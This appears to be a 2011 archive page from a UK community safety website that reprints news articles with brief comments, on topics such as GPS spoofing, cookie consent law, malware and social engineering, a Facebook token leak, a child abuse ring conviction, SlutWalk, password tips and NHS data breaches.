Nevertheless, wireless connections in cars will undoubtedly make a tempting target for hackers. The answer, says Tarnutzer, is for the auto industry to use strong, hardware-based encryption technology. Car companies are, of course, aware of the potential for hackers to disrupt in-car wireless services. Representatives from Ford and GM, for instance, said they are developing strong encryption standards for vehicle-to-vehicle and vehicle-to-back-end-infrastructure communications.

6. GPS jamming and spoofing: Threat or nuisance?

Jamming a GPS signal at the source is next to impossible, says Phil Lieberman, founder of enterprise security vendor Lieberman Software. Blocking the radio signals broadcast from orbiting GPS satellites would require a massive counter-transmission. And because the satellites are operated by the U.S. military, jamming them would be considered an act of war and a federal crime, says Lieberman.

However, it is easy to jam GPS receivers with a low-cost jamming device like one sold by Brando. The devices jam the GPS reception by overloading it with a similar signal -- the receiver becomes confused because it can't find a steady satellite transmission.

Lieberman says this kind of jamming is usually more of an annoyance than a major security threat. A nefarious hacker could, for instance, set up a jammer in an intersection and temporarily disable the GPS in passing vehicles. These attacks are relatively rare, says Lieberman: "It is usually just sociopaths doing this kind of thing."

Security expert Roger Johnston, a systems engineer at the Argonne National Laboratory in Chicago, says spoofing GPS signals is the greater danger, explaining that GPS receivers are low-power devices that latch on to any strong signal. In tests, he has set up a GPS spoofing signal, operated out of a passenger car, that sends erroneous GPS information to nearby receivers. "You don't have to know anything about electronics or GPS to set these up; they are very user-friendly," says Johnston.

Johnston says spoofing could be used for serious crimes, such as transmitting information to a delivery truck that routes it into a dark alley where criminals are waiting, changing the timestamps on financial transactions, delaying emergency vehicles from finding their routes. There have been no reported cases of GPS spoofing to commit a criminal act, but Johnston warns that government and business should work to deter the attacks.


(1st June 2011)


 

WEBSITES MUST GET CONSENT FOR COOKIES
(Courtesy of : Computer Active, dated 26th May 2011)
www.computeractive.co.uk  [Note 1]

Changes to the way companies can use "cookies" will be in force by the 26th May 2011.

An amendment to the EU Privacy and Electronic Communications Regulations says that explicit consent now has to be obtained from users or subscribers to a site before a company can place a cookie on their PC.

Cookies are text files that are downloaded to a PC when a website is visited. They store information about a internet users online interests and which websites they visit. While most are benign and often needed for some services, others gather and store more personal data about web users "behaviour" than many privacy experts feel is neccessary or desirable.

It is already possible to opt out of using cookies (www.computeractive.co.uk/1915747) [Note 1]. But the current difficulty is that the authorities have not yet put in place a method of notifying consumers.

The Information Commissioners Office (ICO) has told companies that they can "Choose to make their own switch-off facilities available, or explain to the user or subscriber how they can use the facilities specific to their browser type".

Christoper Graham, Information Commissioner, said: " The implementation of this new legislation is challenging and involves significant technological considerations."

As we were going to press (computer Active ), the ICO told us it was working on draft guidance for consumers that would be available for 26th May 2011.

Information Commissioners Office website : www.ico.gov.uk


 

Additional information

The ICO has quoted the following website as a source of information cookies : www.allaboutcookies.org/

Please note that the uaware.org.uk website currently sends cookies to it's readers PC. This is currently standard practice and all websites carry out the procedure ( even government bodies like the Information Commissioners Office ). This is a default facility that currently cannot be turned off and we are reliant on our supplier to make changes to their systems.Our supplier (mrsite.co.uk) has been requested to turn-off the cookie facility as soon as possible.

No marketing or tracking action ( other than website visitor counter ) is carried out by the operator of the uaware.org.uk website as a result of these cookies being loaded.

Please see the Information Commissioners Office News Release dated 26th May 2011 which is on the E-PRIVACY DIRECTIVE webpage of this website ( see menu tab on the left ).

(26th May 2011)


 


SACK KEN CLARKE OVER RAPE COMMENTS - MILLIBAND
(BBC News, dated 18th May 2011)
www.bbc.co.uk

Ken Clarke should be sacked as justice secretary following his remarks about rape on BBC Radio 5 live, Labour leader Ed Miliband has said.

Mr Clarke disputed claims changes to sentencing rules could see rapists let out in 15 months for pleading guilty.

He said violent "serious rape" had longer terms and average sentencing figures were skewed by underage sex between consenting teenagers.

Mr Miliband said the PM should distance himself from the remarks.

The row follows plans to halve jail terms for people who plead guilty early, including rapists, who on average are sentenced to five years.

'Serious rapes'
 
At present, a defendant entering an early guilty plea can earn up to a third off their sentence. But proposals to halve sentences are outlined in a Green Paper on sentencing in England and Wales.

At prime minister's questions, Mr Miliband said Mr Clarke had suggested there were "serious rapes and other categories of rape" adding: "The justice secretary can't speak for the women of this country when he makes comments like that."

David Cameron told MPs rape was "one of the most serious crimes that there is and it should be met with proper punishment" and the "real disgrace" was that only 6% of reported rape cases ended in a conviction.

He said there was already a plea bargaining system in the UK and the government was only consulting on whether to extend - and had not yet decided what crimes it should include.

The prime minister said he had not heard the interview but the government's position was clear - that rape was serious and should be punished "very severely".

But Mr Miliband told him to go back and listen to the interview adding: "The justice secretary should not be in his post at the end of today."

'Strongest example'
 
Earlier Labour former solicitor general Vera Baird QC told BBC Radio 4's Today programme the standard sentence for rape started at five years.

"If you are talking about halving it to two-and-a-half years and then a person gets out halfway through their sentence on licence which is usual, then we are talking about sentences of 15 months which have no regard at all for the gravity of the offence and gives no time for rehabilitation or training," she said.

The current discount of a third for an early guilty plea was the maximum and not automatic, she added.

But Mr Clarke told Victoria Derbyshire on BBC Radio 5 Live that pushing for an early guilty plea would stop rapists "messing about" and denying charges and would relieve the victim of "going through the whole ordeal again and of being called a liar... we still have far too many people who don't plead guilty in the first place".

He dismissed suggestions rapists could be out in 15 months as "total nonsense".

On being told that the sentence for rape was five years on average, according to the Council of Circuit Judges, Mr Clarke said: "That includes date rape, 17-year-olds having intercourse with 15 year olds.."

"Serious rape - I don't think many judges give five years for a forcible rape frankly, the tariff is longer than that. A serious rape with violence and an unwilling woman - the tariff is longer than that."

When BBC interviewer Victoria Derbyshire interrupted to say "Rape is rape, with respect" Mr Clarke replied: "No it's not, if an 18-year-old has sex with a 15 year old and she's perfectly willing, that is rape. Because she is under age, she can't consent... What you and I are talking about is we are talking about a man forcibly having sex with a woman and she doesn't want to - a serious crime."

He also said date rapes were included in the figures which could be "sometimes very confusing" adding: "Date rape can be as serious as the worst rapes but date rapes... in my very old experience of being in trials [from his time as a practising lawyer]... they do vary extraordinarily one from another, and in the end the judge has to decide on the circumstances."

'Extraordinary spin'
 
He was challenged by a caller from a woman in London, who said she had been the victim of an attempted rape while training for the London marathon - and had fought the criminal justice system for 688 days, only for the rapist to have his sentence reduced for pleading guilty - and then go on to commit another offence.

She told him: "It happened to me. It's a disaster, especially with sex offenders."

A Downing Street spokesman said Mr Clarke was not relaying government policy and would want to make it clear how seriously he takes all rape cases. Asked if Mr Clarke would survive the day in his post, he added: "Yes".

Shadow home secretary Yvette Cooper said Mr Clarke "has to go if he stands by these comments because they are absolutely appalling".

But Mr Clarke told the BBC the "most extraordinary spin" had been put on his comments: "Rape is a very serious crime, that is undoubtedly the case, but I responded to average sentence figures being put to me."

He said consenting sex between underage teenagers "does not usually get the same sort of sentence as a violent attack on a woman who doesn't know the man attacking her" which was likely to result in a much longer sentence.

"Individual cases get different sentences because the judge has to reflect how bad a case of rape this is - but all cases of rape are bad, it is a serious crime."


Website comment

This article has not been placed on the website for any political purpose. It appears that there needs to be a total rethink of the laws in respect of sexual crimes. The words used such as "serious rape" doesn't make sense; as a layman is there any other form of rape..."semi-consential rape", "considerate rape", "the man loved her really rape" ? No there isn't, rape is rape.

If the "statistics" are being distorted by the numbers of consential underage sex cases between teenagers then perhaps the wording of the crime category needs to be changed.

No wonder female groups around the Western World are arranging these "Slutwalks" ! Perhaps as part of the Big Society Mr Clarke needs to listen to what Rape support groups say as far as definitions are concerned when tinkering with sentences rather than what Barristers will be allowed to negotiate for their clients.

Update

BBC News (19th May 2011) Justice Secretary Ken Clarke says he will "choose my words more carefully" after a row over his remarks about rape but dismissed calls for him to quit.

Mr Clarke said he was simply describing a "long-standing factual situation" in which sentences differ depending on the circumstances of a particular rape.

Website Comment : Perhaps it's not what Mr Clarke says, but rather what he thinks and the actions he takes.

(18th May 2011)


ONE IN 14 DOWNLOADS IS MALIOUS SAYS MICROSOFT
(IDG News Service, dated  17th May 2011 author Robert McMillan)
www.idg.com  [Note 1]

The next time a website says to download new software to view a movie or fix a problem, think twice. There's a pretty good chance that the program is malicious.

In fact, about one out of every 14 programs downloaded by Windows users turns out to be malicious, Microsoft said Tuesday. And even though Microsoft has a feature in its Internet Explorer browser designed to steer users away from unknown and potentially untrustworthy software, about 5 percent of users ignore the warnings and download malicious Trojan horse programs anyway.

Five years ago, it was pretty easy for criminals to sneak their code onto computers. There were plenty of browser bugs, and many users weren't very good at patching. But since then, the cat-and-mouse game of Internet security has evolved: Browsers have become more secure, and software makers can quickly and automatically push out patches when there's a known problem.

So increasingly, instead of hacking the browsers themselves, the bad guys try to hack the people using them. It's called social engineering, and it's a big problem these days. "The attackers have figured out that it's not that hard to get users to download Trojans," said Alex Stamos, a founding partner with Isec Partners, a security consultancy that's often called in to clean up the mess after companies have been hacked.

Social engineering is how the Koobface virus spreads on Facebook. Users get a message from a friend telling them to go and view a video. When they click on the link, they're then told that they need to download some sort of video playing software in order to watch. That software is actually a malicious program.

Social-engineering hackers also try to infect victims by hacking into Web pages and popping up fake antivirus warnings designed to look like messages from the operating system. Download these and you're infected. The criminals also use spam to send Trojans, and they will trick search engines into linking to malicious websites that look like they have interesting stories or video about hot news such as the royal wedding or the death of Osama bin Laden.

"The attackers are very opportunistic, and they latch onto any event that might be used to lure people," said Joshua Talbot, a manager with Symantec Security Response. When Symantec tracked the 50 most common malicious programs last year, it found that 56 percent of all attacks included Trojan horse programs.

In enterprises, a social-engineering technique called spearphishing is a serious problem. In spearphishing, the criminals take the time to figure out who they're attacking, and then they create a specially crafted program or a maliciously encoded document that the victim is likely to want to open -- materials from a conference they've attended or a planning document from an organization that they do business with.

With its new SmartScreen Filter Application Reputation screening, introduced in IE 9, Internet Explorer provides a first line of defense against Trojan horse programs, including Trojans sent in spearphishing attacks.

IE also warns users when they're being tricked into visiting malicious websites, another way that social-engineering hackers can infect computer users. In the past two years, IE's SmartScreen has blocked more than 1.5 billion Web and download attacks, according to Jeb Haber, program manager lead for SmartScreen.

Haber agreed that better browser protection is pushing the criminals into social engineering, especially over the past two years. "You're just seeing an explosion in direct attacks on users with social engineering," he said. "We were really surprised by the volumes. The volumes have been crazy."

When the SmartScreen warning pops up to tell users that they're about to run a potentially harmful program, the odds are between 25 percent and 70 percent that the program will actually be malicious, Haber said. A typical user will only see a couple of these warnings each year, so it's best to take them very seriously.

(18th May 2011)



APPLE MALWARE GOES FROM THEORY TO SERIOUS
(CSO Online, dated 11th May 2011 author Robert Lemos)
www.csoonline.com  [Note 1] 

A theory paper written in 2007 predicted that Apple users would see more malware. Now, those predictions are coming true.

Apple and many Mac users argue that Mac OS X has a special recipe for security that makes it less likely to be infected with malware. Many security researchers counter that the Mac's seeming immunity stems not from its security, but from its lack of market share.

The debate may finally be settled.

The emergence of a serious malware construction kit for the Mac OS X seems to mimic a 2008 prediction by a security researcher. The prediction comes from a paper written in IEEE Security & Privacy (in .pdf), which used game theory to predict that Macs would become a focus for attackers as soon as Apple hit 16 percent market share.

Last week, security researchers pointed to a construction kit for creating Trojans for the Mac OS X as a major issue for Mac users. Currently, three countries -- Switzerland, Luxembourg and the United States -- have Mac market share around that level.

"The kit is being sold under the name Weyland-Yutani Bot and it is the first of its kind to hit the Mac OS platform," Peter Kruse, partner and security specialist at security firm CSIS, writes in a blog post. "CSIS finds this crimekit to be quite disturbing news since Mac OS previously to some degree has been spared from the increasing amount of malware which has haunted Windows-based systems for years."

Weyland-Yutani Bot, named for the corporation in the 1979 movie Alien, is currently being sold by its developers. While it is not the first attack on the Mac OS X, crimeware has enabled criminals in the past to scale up attacks quickly.

"What is happening is that people are testing the waters," says Adam O'Donnell, chief architect of the cloud technology group at SourceFire and the author of the 2008 paper. "It just becomes economically viable to do it, so you start seeing these attacks becoming more common."

The 2008 paper used game theory to calculate when attackers would start seeing a payoff in focusing on the Mac OS X over Windows. It simplified the problem by assuming that all PC users ran antivirus software and that no Mac users did. The assumptions helped reduce the problem down to two factors: the effectiveness of the defenses and the marketshare of the dominant platform.

With detection rates for antivirus in the 80 percent range, the Mac OS X becomes an attractive target around 16 percent marketshare. If PC defenses are better than 80 percent, then the Mac market share at which attackers become interested drops. For example, if antivirus programs detect attack 90 percent of the time, then attackers will focus on the Mac OS X at approximately 6 percent marketshare, says O'Donnell.

"It is much more of an argument that at the low rates of penetration of the Mac in the market is why there is no malware," he says. "You get a few points up, and like we are seeing now, you will start seeing malware."

Will the same model work to predict when significant malware will appear on smartphone handsets? Not necessarily. One of the assumptions is that the value of compromising a PC and Mac are identical. That assumption is less likely to hold up between a PC and a handset.

"The difference between a PC and a handset is that there is going to be different values in attacking each," O'Donnell says. "That difference will be a big factor in when people move to attacking a new platform."

(18th May 2011)


 

SYMANTEC SAYS FACEBOOK SITE LEAKED INFORMATION
(IDG News Service, dated 11th May 2011 author Robert McMillan)
www.idg.net/idgns [Note 1]

A programming bug on Facebook's website may have accidentally given advertisers and others access to a treasure trove of personal information, according to security researchers at Symantec.

They posted details of the issue Tuesday, saying it may have affected nearly 100,000 Facebook applications for years now.

According to Symantec, certain Facebook applications have been inadvertently handing advertisers access tokens -- strings of numbers and letters that can be used by a browser to access Facebook accounts over the Web. "Access tokens are like the 'spare keys' granted by you to the Facebook applications," Symantec said in a blog post. "Each token or 'spare key' is associated with a select set of permissions, like reading your wall, accessing your friend's profile, posting to your wall, etc."

Users habitually grant this type of access to Facebook applications so they can do things such as write on profile walls, but by handing over these tokens to others, application developers were accidentally giving advertisers or online analytics companies a way to get at this information too.

"We estimate that over the years, hundreds of thousands of applications may have inadvertently leaked millions of tokens to third parties," Symantec said.

The tokens were leaked in referring URLs that Facebook applications passed on to advertisers and others. That shouldn't have happened.

But Facebook says there's no evidence that these tokens were ever misused -- something that would have violated Facebook developer and advertising policies. The company has "conducted a thorough investigation which revealed no evidence of this issue resulting in a user's private information being shared with unauthorized third parties," Facebook said in a statement.

Facebook opened up its social network to third-party Web developers in 2007, and they've become key to the site's phenomenal success. But security experts have said that users should be careful to only authorize Facebook apps that they really want to use.

Symantec said it's not clear whether anyone realized that this problem existed, so it's possible that nobody has taken advantage of the bug to snoop on users.

Facebook has now fixed the problem, but it could still be a big problem for users, according to Symantec. That's because these tokens may still be in circulation, stored in server log files or in other places on the Web.

One of these access tokens will keep working until the Facebook user changes his password, so Symantec said that concerned users should change their Facebook passwords, like "changing the lock" on their Facebook account.

The issue doesn't affect Facebook applications that use the newer OAUTH2.0 authentication system, Symantec said.

(18th May 2011)


 

METROPOLITAN POLICE SURVEY ON FRONT COUNTERS
(From the office of Joanne McCartney the London Assembly member for Enfield and Haringey, dated 6th May 2011)

This Survey closes on 27th May 2011.

Assembly Member and lead Labour Member for Policing Joanne McCartney urges residents to have their say.

The Metropolitan Police have launched a survey to hear from Londoners how they access police services.  The Met are reviewing the way the public access police services and police front counters includes access to police stations. 

Joanne McCartney said "The Met's review could lead to possible closures of some police stations in local areas, so it is vital that residents have their say at this early stage."

The survey asks about telephone and on-line services as well as front counter availability, and the feedback is intended to inform the Metropolitan Police plans to review public access later in the year.

Joanne said "This 10 minute survey will shape and inform the wider consultation later in the year which will look in detail at front counters in our local areas."

The Met Police have already stated that one of their options is to have one 24hr police station in each borough supported by scheduled drop in desks in other locations.

Joanne concluded "I am very concerned that the Met's review hasn't been publicised widely, and I want to make sure Londoners take part and make their views heard before the survey closes on 27th  May 2011." 

Take part in the Metropolitan Police survey at :

http://www.met.police.uk/contacts/public_access_survey.htm

(9th May 2011)



FOUR MEN ADMIT £2.2 million UK CHILD PORN RING
(Sky News, dated 7th May 2011 author Darren Little)
http://news.sky.com  [Note 1] 

Four men have pleaded guilty to offences linked to a multi-million pound internet child porn ring. The group made £2.2m from subscriptions to their 'news service', which was run from the hamlet of Martin Dales in Lincolnshire.

A total of 132 British children have been put into protective custody as a result of the investigation.

More than 1,300 people from 45 countries used the site to access millions of child abuse images.

Those subscribing to the service, called Athenanews, were able to access and download folders labelled "teens", "baby" and "boys".

The investigation has also seen a number of British paedophiles removed from positions of trust, including teachers, doctors and police officers.

Ian Frost, aged 35, of Woodhall Spa, Sheffield, Paul Frost, 37, of Woodhouse, Sheffield, and Ian Sambridge, 32, of St Albans, Herts, pleaded guilty to distributing indecent photos of children.

Paul Rowland, 34, of Woodhall Spa, admitted making, possessing and distributing child porn. Nottingham Crown Court heard all four men will be sentenced at a later date.

Detective Chief Superintendent Roger Bannister from Lincolnshire Police said: "I hope this sends out a powerful message to people with a sexual interest in children worldwide; the internet is not a place for this kind of activity. "We will trace you and you will be brought to justice."

Peter Davies, from the Child Exploitation and Online Protection Centre, said: "Many of the images being shared online were horrific.

"The lengths to which people went to try and conceal their criminal activity were huge but did not prevent them being caught by persistent and dedicated work."

The investigation led to the identification of 211 suspects in the UK and there have been 38 convictions to date.



Further Information - prevention and reporting

NSPCC : www.nspcc.org.uk
ChildLine : www.childline.org.uk
CEOP : www.ceop.police.uk

 

(9th May 2011)


 

SLUTWALK MARCH PLANNED FOR LONDON
(BBC News, dated 9th May 2011)
www.bbc.co.uk

A protest movement sparked by a Canadian police officer's advice to women to "avoid dressing like sluts" is coming to England.

The SlutWalk march in London, starting in Trafalgar Square, is being planned for 4th June 2011.

Thousands of people have taken part in such marches across the US and Canada.

Organisers say the aim is to highlight a culture in which the victim, rather than rapist or abuser, is blamed.

'Reaction shows relevance'
 
The Facebook page for SlutWalk London already has more than 3,500 people registered to take part.

Student Anastasia Richardson, 17, who is organising the SlutWalk in London, said that the movement clearly relates to people in Britain.

She said: "I think the reaction shows how relevant it is, especially in Britain where only 6.5% of rape cases end in convictions - and that's the ones we know about."

About 3,000 people took part in the first SlutWalk in Toronto last month and 2,000 people took part in a SlutWalk in Boston on Saturday.

The movement started after Toronto police constable Michael Sanguinetti, who had been giving a talk to a group of students in Toronto, made his remarks."You know, I think we're beating around the bush here," he reportedly told them. "I've been told I'm not supposed to say this - however, women should avoid dressing like sluts in order not to be victimised."

Raise our voices'
 
He has since apologised and has been disciplined by the Toronto police. He is still on duty.

The SlutWalk London website said it wants to end a culture of fear and victimisation.

"Let's raise our voices and tell the world that rape is never, ever OK," the website says.

"Not if she was wearing a miniskirt. Not if she was naked. Not if she was your wife, girlfriend or friend. Not if she was a prostitute. Not if she was drunk. Not if you thought she wanted to."

London Slutwalk website : http://slutwalklondon.tumblr.com/about


 

Extract of another article from the Evening Standard online (www.thisislondon.co.uk)
[Note 1], dated 9th May 2011
.

"The organisers said they wanted to reappropriate the word "slut" to fight a culture of "fear and victimisation", and some marchers wore provocative clothing to emphasise that no one deserves to be attacked. Thousands are now expected to join a SlutWalk from Trafalgar Square to Hyde Park on June 4, at the same time as rallies in Chicago and Amsterdam.

The SlutWalk London website states more should be done to protect victims. It adds: "All over the world, women are constantly made to feel like victims, told they should not look a certain way, should not go out at night, should not go into certain areas, should not get drunk, should not wear high heels or make up, should not be alone with someone they don't know."


 

Further Information

Rape Crisis Centre : www.rapecrisis.org.uk
Samaritans : www.samaritans.org
Victim Support : www.victimsupport.com
National Stalking Helpline : www.stalkinghelpline.org
National Centre for Domestic Violence : www.ncdv.org.uk
Suzy Lamplugh Trust : www.suzylamplugh.org


(9th May 2011)




HOW TO BUILD BETTER PASSWORDS - WITHOUT LOSING YOUR MIND
(PCWorld magazine, 5th May 2011 author Alex Wawro)
www.pcworld.com  [Note 1] 

Original article [Note 1] : http://cwonline.computerworld.com/t/7324879/753476122/510486/0/

Your e-mail password is your last line of defense when it comes to online privacy and security. A hacker cracks that could reset the passwords of (and gain access to) your social networks, your bank account, and even your identity by taking advantage of the ubiquitous I Forgot My Password button.

It's tempting to use the same password for all of your online accounts, but doing so puts every account in jeopardy if one of them gets hacked. In view of some recent massive security breaches, now's a good time to update your passwords and make sure that each is unique.

A few great password management programs will store all of your passwords in one encrypted database and let you access them with one master password, so you can carry every password you'll ever need on a single thumb drive. A multi-platform password manager with browser support,is even easier to use because it automatically syncs between different computers and browsers, giving you access to your encrypted database from any device, though you do sacrifice the security of keeping your password list confined to a single hard drive.

Using a password manager is a great way to improve your personal security online, but it's not perfect. The perfect password is one you never write down -- a unique string of letters, numbers, and symbols that not even you know until the moment you enter it. That may be beyond our grasp, but you can get awfully close by using a few simple mnemonic tricks.

One Password to Rule Them All

It's fairly easy to create strong, unique passwords by following a few simple rules. First, we need a password "base" with a mix of uppercase and lowercase letters, numbers, and even a symbol or two to spice things up. Pick a phrase that will be easy to remember, and feel free to be as creative as you like. For simplicity's sake I'm going to use one of my favorite dishes, chicken adobo, as our example.

Make sure your passphrase is at least eight characters and avoid obviously memorable topics like proper names, birthdays, and hometowns. You should also avoid picking a single word and changing some of its characters to symbols -- hacker tools are sophisticated enough to overcome that trick. Go for a passphrase -- multiple words strung together -- rather than a password; this makes it harder for hackers working to crack your password by trying every word in the dictionary.

Now that we've picked a passphrase, we need to mash that phrase into a single string (chickenadobo), and then sprinkle in a few capital letters that are simple to remember (ChickenAdobo). Next, let's pepper our password base with a few random characters to keep things interesting Ch!cken@dob0.

Now that we have our base password, we're going to memorize and use it as a skeleton key that will unlock our account on any Website as long as we hold fast to a few simple rules. To create the strongest password possible, we're going to invent a simple naming pattern as a mnemonic device that will help us generate a unique password for every Website we visit.

For example, let's say I decided to always use the first and fourth letter of a Website's domain name in the middle of my passphrase, capitalizing the former while leaving the latter lower-case. That means my Facebook.com account would have the unique password Ch!ckenFe@dob0, while my about.me account would require the password ChckenAu@dob0.

See the pattern? Make up something similar and you'll have a unique alphanumeric password for every website you visit, one that's easy to remember but nearly impossible for hackers to figure out. No password is perfect, but knowing your own unique passphrase and a few mnemonic tricks will go a long way toward keeping your online privacy intact.

(6th May 2011) 



FBI WARNS THAT FAKE BIN LADEN VIDEO IS A VIRUS
(IDG News Service, dated 3rd May 2011 author Robert McMillan)
www.idg.net/idgns  [Note 1]

The U.S. Federal Bureau of Investigation warned computer users Tuesday that messages claiming to include photos and videos of Osama bin Laden's death actually contain a virus that could steal personal information.

The warning comes as security companies said that they've spotted the first samples of malicious software disguised as photos of the dead Al Qaeda leader.

Security vendor F-Secure said Tuesday that criminals are e-mailing a password-stealing Trojan horse program called Banload to victims, and Symantec said it's seen criminals spamming victims with links to fake "Osama dead" news articles that launch Web-based attacks on visitors.

U.S. authorities do have photos of bin Laden, who was shot in the head during an early morning raid Monday in Pakistan. But these photos have not been released publicly.

Scammers have also used a technique called search engine poisoning to try to trick search engines into listing hacked Web pages that are loaded with malware in their search results. "It's unlikely you'll find pictures or videos of Bin Laden's death online -- but searching for one will certainly take you to sites with malware," wrote F-Secure chief research officer Mikko Hyponnen in a blog post.

The FBI warned Internet users to watch out for fake messages on social network sites and to never download software in order to view a video. "Read e-mails you receive carefully. Fraudulent messages often feature misspellings, poor grammar, and non-standard English," the FBI warning stated.

As a major international news event, bin Laden's death has shown the amazing way information can spread online. Many learned of the terrorist leader's death through Twitter, where the story first broke, or Facebook. But it also underscores how the unfiltered media can quickly spread bad information worldwide.

In the two days since the early morning raid, the bin Laden story has generated fake photographs, fake quotes, and plenty of scams.

Security experts said that shady marketers and so-called rogue antivirus vendors have also jumped on the bin Laden bandwagon. The rogue antivirus software bombards victims with pop-up messages telling them they have a computer problem. Its aim: to nag them into paying for bogus software.

Shady marketers are spreading messages on Facebook that try to lure victims into spreading the message to friends and visiting marketing Web sites, by claiming they have a censored video.

"Osama is dead, watch this exclusive CNN video which was censored by Obama Administration due to level of violence, a must watch," is a typical lure used in the scam. Users are encouraged to cut and paste malicious JavaScript code into their browser, which then sends the message to all of their Facebook friends. Security experts say never to cut and paste scripts into the browser.

(5th May 2011)


ARE YOU BLACKLISTED - ADDRESSES CAR INSURERS WON'T TOUCH
(Daily Mail, dated 4th May 2011 author James Salmon)
www.dailymail.co.uk

Honest motorists face soaring premiums as a 'fraud epidemic' sweeping the country causes insurers to blacklist certain postcodes in secret.

Motorists have seen a record 40?per cent hike in premiums over the past year, with the average annual comprehensive policy forecast to break the £1,000 barrier within 12 months.
Insurers say a major reason for this increase is fraudulent claims that are estimated to cost £2.7billion a year, adding £44 to the annual premium of honest motorists.

Confidential documents from a leading fraud specialist shown to Money Mail pinpoint areas across the country where insurers are putting premiums up even further because of high concentrations of fraudulent claims.

And brokers say some insurance firms are refusing to cover motorists at all in certain areas.

Common frauds include staged accidents, often perpetrated by criminal gangs who deliberately cause innocent motorists to crash into them.
Last week, three more people were jailed for a £5.3?million 'cash-for-crash' scam at Luton Crown Court.
Other examples include bogus injury claims - whiplash being the most common - and fronting, where parents cut costs by claiming they are the main driver on an insurance policy for their child's car.

Each year, Keoghs - a law firm specialising in investigating suspicious claims on behalf of insurance companies - publishes the worst areas for fraud.

But it also provides insurers with secret information on the worst postcodes. This list, which is not made public, has been obtained by Money Mail.
The top ten areas for suspicious claims are parts of Birmingham, Liverpool, Bradford, East London, Manchester, North London, Bolton, Blackburn, Southall and Oldham. These towns and cities account for more than four in ten suspicious claims.
The worst 'blackspot' is Birmingham - generating almost one in ten suspicious claims.

This compares with fewer than one in a hundred in West London. But the analysis given to insurers also shows huge variations within towns and cities.
The postcode B8 - east of Digbeth in Birmingham - generated almost 13?per cent of suspicious claims in the city. Meanwhile, just over 1??per cent came from B15 in Edgbaston, according to 2010 analysis.

Areas that have seen the biggest growth in suspicious claims this year include Newcastle, Peterborough, Preston and Chester - all now rated as 'fraud blackspots'.
James Heath, head of counter fraud strategy at Keoghs, said: 'We are now seeing what can reasonably be described as a fraud epidemic across the UK.'It is clear from these results that fraud is no longer restricted to the country's most heavily built-up areas.'

The result is that even law-abiding drivers without a claim to their name who live in these areas can struggle to find affordable insurance.

One insurance broker, based in London, told Money Mail about several quotes he had recently secured on behalf of customers where most insurers had refused to provide cover because of the area in which they lived.

One 58-year-old male driver living in Wood Green, North London - N22 - saw his premiums double from £727 to £1,598 when his policy came up for renewal this year.
Zurich, Ageas, Axa, Provident and Royal & Sun Alliance all refused even to provide a quote, labelling it an 'unacceptable' area. A customer living in E4 - Chingford, East London - had a similar problem.

The broker said: 'There is no doubt some postcodes are blacklisted by most insurance companies because these areas are deemed to be too high risk.' Other insurance brokers report a similar story.
Ian Crowder, from the AA, said: 'It's a bit of a postcode lottery. Certainly some areas are in danger of being blacklisted by certain insurance companies because they are seen to pose such a high risk.'

Graeme Trudgill, head of corporate affairs at trade body the British Insurance Brokers' Association, said: 'As with flooding, there are certain areas that insurers are just not keen on. We've heard of rates in some parts of Birmingham tripling.'

The insurance industry - spearheaded by its trade body the Association of British Insurers - says it is doing everything it can to crack down on fraud. In 2006, it set up the Insurance Fraud Bureau to detect fraud and expose criminal gangs. It pools the information of insurance companies and is helping police on 27 police investigations.
Glenn Marr, director of the IFB, said: 'This fraud has an impact on the cost of insurance for genuine customers and the industry is committed to rooting out and bringing to justice those criminals who target insurers.'

An Axa spokesman said: 'For areas where there is a high risk, we do refuse cover and we use historical claims information to help us determine these areas. 'Our experience shows us that certain areas give rise to exceptionally poor claims, but these are not exclusively driven by fraud.

'Axa employs a number of fraud prevention initiatives to ensure we are preventing certain individuals from getting cover rather than penalising large groups.'

'My premium rose £300'
 
Stuart Lea saw his annual motor insurance premium with Direct Line jump from £800 to £1,100 when it came up for renewal this year.
Mr Lea, 33, from Birkenhead, near Liverpool, says he was baffled because he has an impeccable driving record and has built up 15 years of no claims.
'Every year my premiums go up,' he says. 'It's disgusting that honest drivers have to foot the bill for fraudsters.'

Andy Goldby, from Direct Line, says: 'We have witnessed an increase in both the number of claims and their severity in Mr Lea's postcode, in particular relating to whiplash claims.'

(5th May 2011)




THE BIGGEST THREAT TO NHS DATA SECURITY : ITS STAFF
(Guardian Professional, dated 4th May 2011 author Sade Laja)
http://www.guardian.co.uk/guardian-professional

Original Article :

http://www.guardian.co.uk/healthcare-network/2011/may/04/biggest-threat-nhs-data-security-staff?INTCMP=SRCH

Health service staff treat patient confidentiality as a given. But research by Guardian Healthcare shows that employees, rather than IT departments or management, are behind the leading reasons for that confidentiality being broken.

Figures released by 30 trusts in London under Freedom of Information (FoI) suggest that data breaches consist mainly of staff losing devices or information, disposing of it inappropriately or giving out data in error.

There were a total of 909 data breaches of personal information by the 30 trusts in the capital from 2008 to early 2011. NHS Barnet (Primary Care) topped the list with 187 data breaches of personal information over the last three years, with most breaches falling into its consent, communication and confidence or documentation (including record management) categories.

Chelsea and Westminster hospital foundation trust came second with 123 data breaches. The data suggests that the problem is getting worse: in 2008-09 the trust recorded 34 incidents, 44 in 2009-10 and 45 between April 2010 to February 2011.

Guardian Healthcare asked all 71 trusts in London (before the formation of clusters) to list all data breaches by staff of personal information over the last three years, and received 30 responses with the requested data. This data was given in differing formats, with the level of detail in relation to incidents differing from trust to trust. This makes it difficult to put all the breaches into a definitive category, although on a broad scale the majority of incidents would be considered low level.

But the nature of most recorded incidents does suggest that a large number could have been prevented if better data security awareness was in place at these organisations. Such examples include a fax containing patient information being sent to the wrong person at one foundation trust, while confidential waste was emptied and bagged as recycling waste at another.

The most recent incidents at South London healthcare trust, which has logged 53 data breaches since 2008-09, involved the loss of a USB stick, emails being sent to the wrong email address, patient identifiable data being left behind the reception area by a doctor after he or she had left employment at the trust and a member of staff inappropriately viewing patient notes.

The reporting of data breaches remains a grey area. NHS organisations record them in different ways, using different categories to define breaches of personal information. It may also be a possibility that organisations are becoming better at spotting incidents and are therefore reporting them more, while the differing levels between trusts of similar size could be attributed to some not being as efficient as their counterparts at recording data breaches.

Crime and punishment

The Information Commissioner's Office (ICO) has spoken repeatedly about the importance of clear security and disclosure procedures so that staff can understand and properly implement a code of conduct. It has also said that it will not hesitate to punish organisations if a "serious" breach of the Data Protection Act was likely to cause "substantial" damage or distress. But critics of the central government watchdog, which was given new powers last year to issue fines of up to £500,000 for breaches of the act, say that the ICO appears reluctant to impose such penalties.

Most of the low level breaches reported by the London trusts were dealt with internally, with the most common action resulting in training and awareness sessions for staff involved in breaches or new procedures being implemented at the trusts concerned.

